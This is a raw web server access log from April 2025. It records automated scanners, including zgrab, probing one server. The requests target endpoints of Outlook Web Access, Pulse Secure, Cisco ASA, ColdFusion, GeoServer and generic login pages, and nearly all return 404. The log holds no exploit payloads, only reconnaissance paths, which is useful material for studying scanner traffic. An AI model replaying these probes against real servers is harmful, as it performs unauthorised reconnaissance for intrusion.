137.184.105.192 - - [27/Apr/2025:16:44:11 +0200] "GET /aaa9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
137.184.105.192 - - [27/Apr/2025:16:44:29 +0200] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
137.184.105.192 - - [27/Apr/2025:16:44:40 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "\x16\x03" 400 383 "-" "-"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET /login.php HTTP/1.1" 404 369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET /dniapi/userInfos HTTP/1.1" 404 376 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET /webui HTTP/1.1" 404 365 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET /api/v2/about HTTP/1.1" 404 372 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET /webui HTTP/1.1" 404 365 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET /owa/ HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET /user HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET /owa/ HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET /human.aspx?arg12=infotech HTTP/1.1" 404 370 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1" 404 386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:58 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 378 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:59 +0200] "GET /CFIDE/componentutils/ HTTP/1.1" 404 381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
145.239.154.85 - - [27/Apr/2025:16:55:59 +0200] "GET /geoserver/index.html HTTP/1.1" 404 380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
